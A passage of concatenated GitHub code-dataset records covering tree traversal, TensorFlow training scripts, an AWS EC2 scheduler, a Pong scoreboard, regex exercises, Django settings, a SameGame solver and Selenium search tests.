len(q)\n for i in range(n):\n # popping mechanism\n if (l % 2 == 0):\n temp = q[-1]\n q.pop()\n else:\n temp = q[0]\n q.popleft()\n \n # pushing mechanism\n if (l % 2 != 0):\n if (temp.right):\n q.append(temp.right)\n v.append(temp.right.data)\n if (temp.left):\n q.append(temp.left)\n v.append(temp.left.data)\n elif (l % 2 == 0):\n if (temp.left):\n q.appendleft(temp.left)\n v.append(temp.left.data)\n if (temp.right):\n q.appendleft(temp.right)\n v.append(temp.right.data)\n l+=1 # level plus one\n return v\n\n# vector to store the traversal order.\nv = []\n\n# create tree\nroot = Node(1)\nroot.left = Node(2)\nroot.right = Node(3)\nroot.left.left = Node(7)\nroot.left.right = Node(6)\nroot.right.left = Node(5)\nroot.right.right = Node(4)\nprint(\"ZigZag Order traversal of binary tree is\")\n\nv = zigZagTraversal(root)\n\nfor i in range(len(v)):\n print(v[i], end = \" \")\n \n","repo_name":"DDR7707/Final-450-with-Python","sub_path":"Binary Trees/189.Zig Zag Traversal.py","file_name":"189.Zig Zag Traversal.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"38947833283","text":"import os\nimport sys\nimport shutil\nimport tensorflow as tf\nfrom tqdm import tqdm\nfrom config import FLAGS\nfrom tfsolver import 
TFSolver\nfrom dataset import DatasetFactory\nfrom learning_rate import LRFactory\nfrom network_ae import *\nfrom ocnn import *\n\n\ntf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\n\nif len(sys.argv) < 2:\n print('Usage: python run_cls.py config.ymal')\n\n# update FLAGS\nconfig_file = sys.argv[1]\nFLAGS.merge_from_file(config_file)\nFLAGS.freeze()\n\n# backup the config file\nif not os.path.exists(FLAGS.SOLVER.logdir):\n os.makedirs(FLAGS.SOLVER.logdir)\nshutil.copy2(config_file, FLAGS.SOLVER.logdir)\n\n# define the graph\ndef compute_graph(training=True, reuse=False):\n FLAGSD = FLAGS.DATA.train if training else FLAGS.DATA.test\n with tf.name_scope('dataset'):\n dataset = DatasetFactory(FLAGSD)\n octree, label = dataset()\n code = octree_encoder(octree, FLAGS.MODEL, training, reuse)\n loss, accu = octree_decoder(code, octree, FLAGS.MODEL, training, reuse)\n with tf.name_scope('compute_loss'):\n var_all = tf.trainable_variables()\n reg = tf.add_n([tf.nn.l2_loss(v) for v in var_all]) * FLAGS.LOSS.weight_decay\n total_loss = tf.add_n(loss + [reg])\n tensors = loss + [reg] + accu + [total_loss]\n depth = FLAGS.MODEL.depth\n names = ['loss%d' % d for d in range(2, depth + 1)] + ['normal', 'reg'] + \\\n ['accu%d' % d for d in range(2, depth + 1)] + ['total_loss']\n return tensors, names\n\n# define the solver\nclass AeTFSolver(TFSolver):\n def __init__(self, flags):\n super(AeTFSolver, self).__init__(flags)\n\n def build_train_graph(self):\n self.train_tensors, tensor_names = compute_graph(training=True, reuse=False)\n self.test_tensors, tensor_names = compute_graph(training=False, reuse=True)\n total_loss = self.train_tensors[-1]\n self.op_train, lr = build_solver(total_loss, LRFactory(self.flags))\n self.summaries(tensor_names + ['lr'], self.train_tensors + [lr,],\n tensor_names)\n\n def build_test_graph(self):\n self.test_tensors, self.test_names = compute_graph(training=False, reuse=False)\n\n def decode_shape(self):\n # build graph\n FLAGSM = FLAGS.MODEL\n with tf.name_scope('dataset'):\n dataset = DatasetFactory(FLAGS.DATA.test)\n octree, label = dataset()\n code = octree_encoder(octree, FLAGSM, training=False, reuse=False)\n octree_pred = octree_decode_shape(code, FLAGSM, training=False, reuse=False)\n\n # checkpoint\n assert(self.flags.ckpt) # the self.flags.ckpt should be provided\n tf_saver = tf.train.Saver(max_to_keep=20)\n\n # start\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n with tf.Session(config=config) as sess:\n # restore and initialize\n self.initialize(sess)\n tf_saver.restore(sess, self.flags.ckpt)\n logdir = self.flags.logdir\n tf.summary.FileWriter(logdir, sess.graph)\n\n print('Start testing ...')\n for i in tqdm(range(0, self.flags.test_iter)):\n origin, reconstructed = sess.run([octree, octree_pred])\n with open(logdir + ('/%04d_input.octree' % i), \"wb\") as f:\n f.write(origin.tobytes())\n with open(logdir + ('/%04d_output.octree' % i), \"wb\") as f:\n f.write(reconstructed.tobytes())\n\n# run the experiments\nsolver = AeTFSolver(FLAGS.SOLVER)\nif FLAGS.SOLVER.run == \"train\":\n solver.train()\nelif FLAGS.SOLVER.run == \"test\":\n solver.test()\nelif FLAGS.SOLVER.run == \"decode_shape\":\n solver.decode_shape()\nelse:\n print(\"Error! 
Unsupported FLAGS.SOLVER.run: \" + FLAGS.SOLVER.run)\n","repo_name":"LONG-9621/O-CNN","sub_path":"tensorflow/script/run_ae.py","file_name":"run_ae.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4546249045","text":"#!/usr/bin/python\n\nimport boto\nimport time\nimport datetime\nimport logging\n\n'''\nThis script starts up our dev server every morning at 7am and shuts\nit down again at 7pm. Here is an example cron entry that runs the\nscript on weekdays at 7am and 7pm:\n\n00 07,19 * * 1,2,3,4,5 /usr/bin/python /path/to/startstop.py\n'''\n\n# Set AWS Instance ID for our server\ndev_id = 'i-5a18ab20'\n# Set AWS Elestic IP for our server\ndev_ip = '23.21.175.158'\n\ninstances = [\n\t{'id': 'i-5a18ab20', 'ip': '23.21.175.158', 'name': 'Dev'},\n#\t{'id': 'i-df89f3a6', 'ip': '54.235.169.209', 'name': 'PuppetMaster'},\n\t{'id': 'i-5a1fef3e', 'ip': '54.227.238.117', 'name': 'beck-dev'}\n]\n\n# Setup logging\nlogging.basicConfig(filename='startstop.log',level=logging.INFO)\n\n# Make our connection to the EC2 API. boto looks for our API\n# key pair in ~/.boto\nec2 = boto.connect_ec2()\n\n# Datetim object\nnow = datetime.datetime.now()\n\nlogging.info('Start run: ' + now.strftime(\"%Y-%m-%d %H:%M\"))\n\nfor instance in instances:\n\t# If it is 7am we need to bring the instance up\n\tif now.hour == 7:\n\t\tlogging.info(instance['name'])\n\t\n\t\t# This starts the instance\n\t\tec2.start_instances(instance_ids=[instance['id']])\n\t\n\t\t# Now we need to create an ofject for the instance so we can\n\t\t# check its status.\n\t\treservations = ec2.get_all_instances()\n\t\n\t\tallinstances = [i for r in reservations for i in r.instances]\n\t\t\n\t\t# When the instance starts, the status will be 'pending'.\n\t\t# We can't attache the elastic IP until the status is 'running'.\n\t\tfor i in allinstances:\n\t\t\tif i.id == instance['id']:\n\t\t\t\tstatus = i.update()\n\t\t\t\twhile status != 'running':\n\t\t\t\t\tlogging.info('Waiting for %s to start' % (instance['name']))\n\t\t\t\t\ttime.sleep(10)\n\t\t\t\t\tstatus = i.update()\n\t\t\t\tif i.state == 'running':\n\t\t\t\t\t# Now that it is running, we can attach the IP.\n\t\t\t\t\tlogging.info('Setting IP for %s' % (instance['name']))\n\t\t\t\t\tec2.associate_address(instance['id'], instance['ip'])\n\t\n\t# If it is 7pm, we need to stop to server.\n\telif now.hour == 19:\n\t\tlogging.info('Stopping %s' % (instance['name']))\n\t\tec2.stop_instances(instance_ids=[instance['id']])\n\t\n\t# If for some reason we run this when we shouldn't will just do nothing.\n\telse:\n\t\tlogging.info('Nothing to do')\n\nlogging.info('Stop run: ' + now.strftime(\"%Y-%m-%d %H:%M\"))\n\n","repo_name":"ecds-archives/cloud-scripts","sub_path":"startstop.py","file_name":"startstop.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36067437707","text":"from turtle import Turtle\n\nclass Scoreboard(Turtle):\n def __init__(self):\n super().__init__()\n self.right_score = 0\n self.left_score = 0\n self.hideturtle()\n self.color(\"white\")\n self.penup()\n self.print_score()\n\n def print_score(self):\n self.goto(0, 300)\n self.clear()\n self.write(f\"{self.left_score} - {self.right_score}\", align=\"center\", font=(\"Courier\", 24, \"normal\"))\n\n def move_score(self, favor):\n if favor == \"right\":\n self.right_score += 1\n elif favor == \"left\": \n self.left_score += 1\n\n 
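The startstop.py script above waits for the 'running' state by polling i.update() in a sleep loop before attaching the Elastic IP. For comparison, here is the same wait written against boto3, the successor of the legacy boto package the script imports, using its built-in waiter; the region is a placeholder and configured AWS credentials are assumed.

import boto3

ec2 = boto3.resource('ec2', region_name='us-east-1')  # region is an assumption
instance = ec2.Instance('i-5a18ab20')  # instance ID taken from the script above
instance.start()
instance.wait_until_running()  # built-in waiter replaces the manual poll/sleep loop
print(instance.id, instance.state['Name'])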
def announce_point(self, favor):\n self.goto(0, 0)\n self.write(f\"Point for {favor} player.\", align=\"center\", font=(\"Courier\", 24, \"normal\"))\n ","repo_name":"grzlz/100days","sub_path":"22-pong/scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13420462352","text":"# Meta caracteres: ^ $ ( )\r\n# * 0 ou n\r\n# + 1 ou n {1,}\r\n# ? 0 ou 1\r\n# {n}\r\n# {min, max}\r\n# {10,} 10 ou mais\r\n# {,10} De zero a 10\r\n# {10} Especificamente 10\r\n# {5,10} De 5 a 10\r\n# ()+ [a-zA-Z0-9]+\r\n\r\n\r\n# Importando uma biblioteca\r\nimport re\r\n\r\n\r\n# Declarando uma variável\r\ntext = '''\r\nJoão brought flowers to his beloved girlfriend on January 10, 1970,\r\nMaria was her name.\r\n\r\n\r\nIt was an excellent year in the life of joão. He had 5 children, all of whom are currently adults.\r\nmaria, now his wife, still makes that coffee with cheese bread in the afternoons of\r\nSunday. Also right! Being the good miner she is, she never forgets her famous\r\ncheese bread.\r\nI can't get enough of listening to Maria:\r\n\"Joooooooooãooooooo, the coffee is ready here. Comeeess\"!\r\n'''\r\n\r\nprint(re.findall(r'jo+ão', text, flags=re.IGNORECASE)) # Escolhendo João e incluindo o utilizando + e ignorando as\r\n# letras tanto maiúscula como minúscula\r\n\r\nprint(re.sub(r'jo+ão', 'Felicty', text, flags=re.IGNORECASE)) # Substituindo João e trocando pelo nome de Felicty\r\n# incluindo o utilizando + e ignorando as letras tanto maiúscula como minúscula\r\n\r\nprint(re.sub(r'jo*ão*', 'Felicty', text, flags=re.IGNORECASE)) # Substituindo João e trocando pelo nome de Felicty\r\n# incluindo o utilizando + e ignorando as letras tanto maiúscula como minúscula\r\n\r\nprint(re.sub(r'jo?ão*', 'Felicty', text, flags=re.I)) # Substituindo João e trocando pelo nome de Felicty\r\n# incluindo o utilizando + e ignorando as letras tanto maiúscula como minúscula\r\n\r\nprint(re.findall(r'jo{1,}ão{1,}', text, flags=re.I)) # Encontrando João e incluindo o utilizando + e ignorando\r\n# as letras tanto maiúscula como minúscula\r\n\r\nprint(re.findall(r'Come{3}e{1,2}', text, flags=re.I)) # Encontrando a palavra vem no texto e ignorando as letras\r\n# tanto maiúscula como minúscula\r\n\r\nprint(re.findall(r'j[o]+ão+', text, flags=re.I)) # Encontrando a palavra joão no texto e ignorando as letras\r\n# tanto maiúscula como minúscula\r\n\r\n\r\n# Declarando uma variável\r\ntext_02 = 'John loves to be loved'\r\n\r\n# Apresentando na tela do usuário\r\nprint(re.findall(r'lov[ed]{0,2}', text_02, flags=re.I)) # Encontrando a palavra love e loved no texto e ignorando\r\n# as letras anto maiúscula como minúscula.\r\n","repo_name":"romulovieira777/Expressoes_Regulares_em_Python","sub_path":"aula_03.py","file_name":"aula_03.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43068676567","text":"import sentry_sdk\nfrom sentry_sdk.integrations.django import DjangoIntegration\n\nfrom .base import *\n\nsentry_sdk.init(\n dsn=\"https://dd867937f2e142fa9a39d1f0cedac357@sentry.io/1463061\",\n integrations=[DjangoIntegration()]\n)\n\nDEBUG = False\n\nALLOWED_HOSTS = [\n os.environ.get('DOMAIN', 'example.com')\n]\n\nPROJECT_ROOT = os.path.dirname(os.path.dirname(\n os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))\n\nMEDIA_ROOT = os.path.join(PROJECT_ROOT, 'media')\nSTATIC_ROOT = 
os.path.join(PROJECT_ROOT, 'static')\n\n# FILE SYSTEM\n\nNGINX_ROUTE = '/etc/nginx'\nGIT_PROJECTS_ROUTE = os.environ.get('GIT_PROJECTS_ROUTE', '/path/to/git/apps')\n\n# CORS\n\nCORS_ORIGIN_WHITELIST = (\n os.environ.get('FRONT_APP_DOMAIN', 'example.com')\n)\n\nCSRF_TRUSTED_ORIGINS = (\n os.environ.get('FRONT_APP_DOMAIN', 'example.com')\n)\n","repo_name":"orchestrapi/orchestrapi","sub_path":"core/settings/prod.py","file_name":"prod.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"33519515506","text":"#Grupo 3: 80832 Margarida Ferreira, 81805 Duarte David\n\nfrom search import *\n\n# TAI color\n# sem cor = 0\n# com cor > 0\ndef get_no_color():\n return 0\ndef no_color (c):\n return c==0\ndef color (c):\n return c > 0\n\n# TAI pos\n# Tuplo (l, c)\ndef make_pos (l, c):\n return (l, c)\ndef pos_l (pos):\n return pos[0]\ndef pos_c (pos):\n return pos[1]\n\ndef print_board (board):\n for line in board:\n for cell in line:\n print(cell, end =' ')\n print()\n\ndef board_remove_group(board, group):\n # 1. Fazer uma copia do tabuleiro\n # 2. Colocar a 0 todas as posicoes do do grupo\n # 3. Compacatacao vertical\n # 4. Compactacao horizontal\n l = []\n i = 0\n j = 0\n for line in board:\n l.append([])\n for cell in line:\n l[i].append(cell)\n j+=1\n i+=1\n \n #compacts each column vertically\n #and eliminates a column if empty (compacts horizontally)\n missing_columns = 0\n j = 0\n while j < len(board[0]):\n advance = 0\n \n if(j+missing_columns <= len(board[0])-1): \n for i in reversed(range(0, len(board))):\n while make_pos(i-advance,j+missing_columns) in group:\n advance+=1\n \n if (advance > 0 or missing_columns > 0) and (i - advance) >= 0:\n l[i][j] = l[i-advance][j+missing_columns]\n elif (i-advance) < 0:\n l[i][j] = 0 \n \n #empty column case\n if l[len(board)-1][j] == 0:\n missing_columns += 1\n j-=1\n else:\n for i in range(0, len(board)):\n l[i][j] = 0\n \n j+=1\n \n return l\n\ndef board_find_groups(board):\n groups = []\n found = []\n i = 0\n for line in board:\n found.append([])\n for cell in line:\n found[i].append(0)\n \n i+=1\n \n for i in range(0, len(board)):\n for j in range(0, len(board[0])):\n \n if color(board[i][j]):\n group = board_get_group(make_pos(i,j), board, found)\n if (not group is None):\n groups.append(group)\n \n \n return groups\n\ndef board_get_group(pos, board, found):\n i = pos_l(pos)\n j = pos_c(pos)\n group = []\n if found[i][j] > 0:\n return None\n else:\n found[i][j] = 1\n group.append(pos)\n \n if i0:\n if board[i][j] == board[i-1][j]:\n g = board_get_group(make_pos(i-1,j), board, found)\n if not g is None:\n group+=g\n \n if j0:\n if board[i][j] == board[i][j-1]:\n g = board_get_group(make_pos(i,j-1), board, found)\n if not g is None:\n group+=g\n \n \n return group\n\ndef board_get_num_groups(board):\n count = 0;\n for line in board:\n for cell in line:\n if not no_color(cell):\n count+=1\n \n return count\n\ndef board_get_num_colors(board):\n colors = set()\n for line in board:\n for cell in line:\n if not no_color(cell):\n set.add(cell)\n return len(colors)\n\n\n\nclass sg_state:\n state_id = 0\n def __init__(self, board):\n self.board = board\n self.id = sg_state.state_id\n sg_state.state_id += 1\n \n def __lt__(self, other):\n return self.id < other.id\n \nclass same_game(Problem):\n \n def __init__(self, board):\n self.initial = sg_state(board);\n \n def actions(self, state):\n ret_actions = board_find_groups(state.board)\n return [item for item in 
ret_actions if len(item)>1]\n \n def result(self, state, action):\n return sg_state(board_remove_group(state.board, action))\n \n def goal_test(self, state):\n # Board is empty if the lower left slot is empty\n pos = make_pos(len(state.board)-1, 0)\n return no_color(state.board[pos_l(pos)][pos_c(pos)])\n \n def h(self, node):\n return len(board_find_groups(node.state.board))\n","repo_name":"Marghrid/Artificial-Intelligence","sub_path":"proj1/sg_g3.py","file_name":"sg_g3.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74049346384","text":"import os\nimport tensorflow as tf\nfrom tensorflow.keras.optimizers import RMSprop\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nimport matplotlib.pyplot as plt\n\nbase_dir = '/tmp/horse-or-human-update'\ntrain_dir = os.path.join(base_dir, 'train')\nvalidation_dir = os.path.join(base_dir, 'validation')\n\ntrain_horse_dir = os.path.join(train_dir, 'horses')\ntrain_human_dir = os.path.join(train_dir, 'humans')\nvalidation_horse_dir = os.path.join(validation_dir, 'horses')\nvalidation_human_dir = os.path.join(validation_dir, 'humans')\n\nmodel = tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(16, (3,3), activation=tf.nn.relu, input_shape=(300,300, 3)),\n tf.keras.layers.MaxPooling2D(2,2),\n tf.keras.layers.Conv2D(32, (3,3), activation=tf.nn.relu),\n tf.keras.layers.MaxPooling2D(2,2),\n tf.keras.layers.Conv2D(64, (3, 3), activation=tf.nn.relu),\n tf.keras.layers.MaxPooling2D(2, 2),\n tf.keras.layers.Conv2D(64, (3, 3), activation=tf.nn.relu),\n tf.keras.layers.MaxPooling2D(2, 2),\n tf.keras.layers.Conv2D(64, (3, 3), activation=tf.nn.relu),\n tf.keras.layers.MaxPooling2D(2, 2),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(512, activation=tf.nn.relu),\n tf.keras.layers.Dense(1, activation=tf.nn.sigmoid)\n])\n\n\nmodel.compile(loss='binary_crossentropy', optimizer=tf.optimizers.RMSprop(lr=1e-4), metrics=['accuracy'])\n\ntrain_datagen = ImageDataGenerator(\n rescale=1.0/255,\n rotation_range=40,\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True,\n fill_mode='nearest'\n)\n\nvalidation_datagen = ImageDataGenerator(\n rescale=1.0/255\n)\n\ntrain_generator = train_datagen.flow_from_directory(\n train_dir,\n target_size=(300,300),\n batch_size=128,\n class_mode='binary'\n)\n\nvalidation_generator = validation_datagen.flow_from_directory(\n validation_dir,\n target_size=(300,300),\n batch_size=32,\n class_mode='binary'\n)\n\n\nresults = model.fit(\n train_generator,\n steps_per_epoch=8,\n epochs=5, # use 100 in Google Colab\n validation_data=validation_generator,\n validation_steps=8,\n verbose=1\n)\n\naccuracy = results.history['accuracy']\nval_accuracy = results.history['val_accuracy']\nloss = results.history['loss']\nval_loss = results.history['val_loss']\n\nepochs = range(len(accuracy))\n\nplt.plot(epochs, accuracy, 'r', label='Training accuracy')\nplt.plot(epochs, val_accuracy, 'b', label='Validation accuracy')\nplt.title('Training and validation accuracy')\nplt.legend()\n\nplt.figure()\n\nplt.plot(epochs, loss, 'r', label='Training loss')\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\nplt.title('training and validation loss')\nplt.legend()\n\nplt.show()","repo_name":"finesketch/deep_learning","sub_path":"Coursera - DeepLearning.AI TensorFlow Developer/2. 
Convolutional Neural Network/Course2-Part4-Lesson4.py","file_name":"Course2-Part4-Lesson4.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71727694865","text":"# -*- coding: utf-8 -*-\nimport math\n\nfrom support import service_log\nfrom tests.MainClass import MainClass\nfrom tests.front_office.not_sorted.classes.class_navigate import HelpNavigateCheckMethods as Navigate\n\n__author__ = 'm.senchuk'\n\n\nclass SearchData(MainClass):\n USER_NAME = \"пользователь\"\n F_MAP = {\n True: False,\n False: True\n }\n\n\nclass SearchMethods(SearchData):\n @staticmethod\n def search_form(driver):\n \"\"\"\n Метод получа��т объекты формы поиска\n :param driver:\n :return: словарь объектов формы поиска\n \"\"\"\n search_form = {\n \"input\": Navigate.element_is_present(driver, Navigate.input_main.SEARCH),\n \"btn\": Navigate.element_is_present(driver, Navigate.click_main.SEARCH_BTN)\n }\n service_log.put('Получены объекты формы поиска')\n return search_form\n\n @staticmethod\n def left_menu(driver):\n \"\"\"\n Метод получает объекты меню слева на странице поиска и количество найденных товаров и пользователей\n :param driver:\n :return: словарь объектов формы меню\n \"\"\"\n active_url = driver.current_url.encode('utf-8')\n type_search = active_url[active_url.rfind('/') + 1:active_url.rfind('?')]\n menu = {\n \"title\": Navigate.element_is_present(driver, Navigate.check_search.TITLE_SEARCH),\n \"goods\": Navigate.element_is_present(driver, Navigate.click_search.GOODS_MENU[type_search]),\n \"users\": Navigate.element_is_present(driver, Navigate.click_search.USERS_MENU[type_search]),\n }\n menu.update({\"count_goods\": menu[\"goods\"].text.encode('utf-8').strip(\"Товары \")})\n menu.update({\"count_users\": menu[\"users\"].text.encode('utf-8').strip(\"Пользователи \")})\n service_log.put(\"Получены объекты левого меню на странице поиска\")\n return menu\n\n @staticmethod\n def good_card_short(driver, good):\n \"\"\"\n Метод получает объект короткая карточка товара по заданным данным\n :param good: данные товара\n :return:\n \"\"\"\n main_picture = good[\"content\"][u'pictures'][u'value'][0].encode('utf-8')\n title = good[\"content\"][u'title'][u'value'].encode('utf-8')\n min_stock = good[\"content\"][u'min_stock'][u'value']\n try:\n price = str(good[\"content\"][u'price'][u'value'][u'significand'])\n if 3 < len(price) < 7:\n price = price[:-3] + \" \" + price[-3:] # здесь в кавычках неразрывные пробелы\n elif len(price) >= 7:\n price = price[:-6] + \" \" + price[-6:-3] + \" \" + price[-3:]\n except Exception:\n price = \"---\"\n g_card = {\n \"card\": Navigate.element_is_present(driver, Navigate.click_search.GOOD_CARD_BY_ID % good[\"ware_id\"]),\n \"picture\": Navigate.element_is_present(driver, Navigate.click_search.GOOD_PICTURE % (good[\"ware_id\"],\n main_picture)),\n \"title\": Navigate.element_is_present(driver, Navigate.click_search.GOOD_TITLE % (good[\"ware_id\"], title)),\n \"price\": Navigate.element_is_present(driver, Navigate.click_search.GOOD_PRICE % (good[\"ware_id\"], price)),\n \"min_stock\": Navigate.element_is_present(driver, Navigate.click_search.GOOD_MIN_STOCK % (good[\"ware_id\"],\n min_stock)),\n }\n service_log.put(\"Короткая карточка товара найдена. 
Id: %s\" % good[\"ware_id\"])\n return g_card\n\n @staticmethod\n def none_found(driver, test_string):\n \"\"\"\n Метод получает форму пользователей и товаров не найдено\n :param driver:\n :param test_string:\n \"\"\"\n form = {\n 'title': Navigate.element_is_present(driver, Navigate.check_search.CATALOG_ALL_EMPTY % test_string),\n 'description': Navigate.element_is_present(driver, Navigate.check_search.CATALOG_EMPTY_DESC),\n 'btn_catalog': Navigate.element_is_present(driver, Navigate.click_search.BTN_CATALOG)\n }\n return form\n\n @staticmethod\n def found_only_users(driver, test_string):\n \"\"\"\n Метод получает форму товаров не найдено но найдены пользователи\n :param driver:\n :param test_string:\n :return:\n \"\"\"\n form = {\n 'title': Navigate.element_is_present(driver, Navigate.check_search.CATALOG_GOOD_EMPTY % test_string),\n 'description': Navigate.element_is_present(driver, Navigate.check_search.CATALOG_GOOD_EMPTY_DESC),\n 'btn_to_users': Navigate.element_is_present(driver, Navigate.click_search.BTN_TO_USERS % test_string)\n }\n return form\n\n @staticmethod\n def found_only_goods(driver, test_string):\n \"\"\"\n Метод получает форму пользов��телей не найдено но найдены товары\n :param driver:\n :param test_string:\n :return:\n \"\"\"\n form = {\n 'title': Navigate.element_is_present(driver, Navigate.check_search.CATALOG_USER_EMPTY % test_string),\n 'description': Navigate.element_is_present(driver, Navigate.check_search.CATALOG_USER_EMPTY_DESC),\n 'btn_to_goods': Navigate.element_is_present(driver, Navigate.click_search.BTN_TO_GOODS % test_string)\n }\n return form\n\n @staticmethod\n def get_good_ids(driver, len_id=32):\n \"\"\"\n Получить идентификаторы товаров со страницы\n :param driver:\n :param len_id: длина идентификатора товара\n :return:\n \"\"\"\n source_page = driver.page_source.encode('utf-8')\n list_source = source_page.split('/goods/')\n list_source = list_source[1:]\n list_ids = [\"'\" + i[:len_id] + \"'\" for i in list_source]\n str_ids = ','.join(list_ids)\n return str_ids\n\n @staticmethod\n def get_user_ids(driver):\n source_page = driver.page_source.encode('utf-8')\n list_source = source_page.split(Navigate.path_search.PATH_FIND_USER)\n list_source = list_source[1:]\n list_ids = [i[:i.find('\"')] for i in list_source]\n str_ids = ','.join(list_ids)\n return str_ids\n\n\nclass SearchCheckMethods(SearchMethods):\n def search_by_user(self, driver, user, count_users, e_msg=''):\n \"\"\"\n Метод проверяет наличие пользователя в результатах поиска с использованием пагинации\n :param driver:\n :param user:\n \"\"\"\n fail = True\n page = 1\n self.assertNotEqual(int(count_users), 0, \"Не найдено пользователей\")\n all_pages = int(math.ceil(int(count_users) / 40.0))\n while all_pages >= 1:\n try:\n Navigate.element_is_present(driver, Navigate.click_search.LINK_SELLER_AVATAR % user[\"id\"], wait=2)\n Navigate.element_is_present(driver, Navigate.click_search.SELLER_NAME_WITH_ID % (user['id'],\n user[\"display_name\"])\n )\n fail = False\n break\n except Exception:\n all_pages -= 1\n if all_pages >= 1:\n page += 1\n Navigate.element_click(driver, Navigate.click_search.PAG_PAGE % page)\n self.assertFalse(fail, e_msg)\n\n def search_by_good(self, driver, good, count_goods, e_msg=''):\n \"\"\"\n Метод проверяет наличие товара в результатах поиска с использованием пагинации\n :param driver:\n :param good:\n \"\"\"\n fail = True\n page = 1\n self.assertNotEqual(int(count_goods), 0, \"Не найдено товаров\")\n all_pages = int(math.ceil(int(count_goods) / 40.0))\n while 
all_pages >= 1:\n try:\n self.good_card_short(driver, good)\n fail = False\n break\n except Exception:\n all_pages -= 1\n if all_pages >= 1:\n page += 1\n Navigate.element_click(driver, Navigate.click_search.PAG_PAGE % page)\n self.assertFalse(fail, e_msg)\n\n def search_by_no_user(self, driver, user, count_users, e_msg=''):\n \"\"\"\n Метод проверяет отсутствие пользователя в результатах поиска с использованием пагинации\n :param driver:\n :param user:\n \"\"\"\n fail = False\n page = 1\n all_pages = int(math.ceil(int(count_users) / 40.0))\n while all_pages >= 1:\n try:\n Navigate.element_is_present(driver, Navigate.click_search.LINK_SELLER_AVATAR % user[\"id\"], wait=2)\n Navigate.element_is_present(driver, Navigate.click_search.SELLER_NAME_WITH_ID % (user['id'],\n user[\"display_name\"])\n )\n fail = True\n break\n except Exception:\n all_pages -= 1\n if all_pages >= 1:\n page += 1\n Navigate.element_click(driver, Navigate.click_search.PAG_PAGE % page)\n self.assertFalse(fail, e_msg)\n\n def search_by_no_good(self, driver, good, count_goods, e_msg=''):\n \"\"\"\n Метод проверяет отсутствие товара в результатах поиска с использованием пагинации\n :param driver:\n :param good:\n \"\"\"\n fail = False\n page = 1\n all_pages = int(math.ceil(int(count_goods) / 40.0))\n while all_pages >= 1:\n try:\n self.good_card_short(driver, good)\n fail = True\n break\n except Exception:\n all_pages -= 1\n if all_pages >= 1:\n page += 1\n Navigate.element_click(driver, Navigate.click_search.PAG_PAGE % page)\n self.assertFalse(fail, e_msg)\n\n def pagination(self, driver, count, section_xpath, items_in_page=40, e_msg=''):\n \"\"\"\n Проверка пагинации\n :param driver:\n :param count:\n :param section_xpath:\n :param e_msg:\n :return:\n \"\"\"\n current_page = 1\n all_pages = int(math.ceil(int(count) / (items_in_page + 0.0)))\n remaining_pages = all_pages - current_page\n if remaining_pages == 0:\n Navigate.element_is_none(driver, Navigate.click_search.PAG_PAGE % current_page)\n obj_on_page = Navigate.elements_is_present(driver, section_xpath)\n on_page = len(obj_on_page)\n self.assertEqual(count, on_page, e_msg)\n elif remaining_pages >= 1:\n count_on_pages = 0\n while remaining_pages >= 0:\n obj_on_page = Navigate.elements_is_present(driver, section_xpath)\n on_page = len(obj_on_page)\n next_page = current_page + 1\n if remaining_pages != 0:\n self.assertEqual(items_in_page, on_page, e_msg)\n Navigate.element_click(driver, Navigate.click_search.PAG_PAGE % next_page)\n else:\n self.assertEqual(count-count_on_pages, on_page, e_msg)\n count_on_pages += on_page\n current_page += 1\n remaining_pages -= 1\n self.assertEqual(count, count_on_pages, e_msg)\n else:\n self.assertGreaterEqual(remaining_pages, 0, \"Кол-во оставшихся страниц [%s] отрицательно\" % remaining_pages)\n\n def good_state_pagination(self, driver, count, db_link, goods_on_page=40, e_msg=''):\n \"\"\"\n Проверка что товары только в статусе accepted, belived\n :param driver:\n :param count:\n :param goods_on_page:\n :param e_msg:\n :return:\n \"\"\"\n current_page = 1\n all_pages = int(math.ceil(int(count) / (goods_on_page + 0.0)))\n remaining_pages = all_pages - current_page\n count_on_pages = 0\n obj_s = ''\n while remaining_pages >= 0:\n str_ids = self.get_good_ids(driver)\n self.assertNotEqual(obj_s, str_ids, \"Переход на след. 
